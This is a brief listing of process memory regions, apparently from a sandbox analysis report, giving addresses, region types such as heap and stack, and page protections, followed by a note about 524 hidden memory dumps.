2B1E000
heap
page read and write
197000
heap
page read and write
1DD0000
trusted library allocation
page read and write
CB1000
heap
page read and write
50A2000
heap
page read and write
8D8000
heap
page read and write
824000
heap
page read and write
612000
heap
page read and write
25D000
heap
page read and write
BAE000
stack
page read and write
1DC0000
trusted library allocation
page read and write
6200000
heap
page read and write
2ACD000
stack
page read and write
35DC000
stack
page read and write
20000
heap
page read and write
2B60000
heap
page read and write
832000
heap
page read and write
46E000
heap
page read and write
4F0000
trusted library allocation
page read and write
2B48000
heap
page read and write
3C0000
heap
page execute and read and write
2F10000
heap
page read and write
EFE000
stack
page read and write
500000
heap
page read and write
1E3000
trusted library allocation
page execute and read and write
5E7E000
stack
page read and write | page guard
There are 524 hidden memdumps, click here to show them.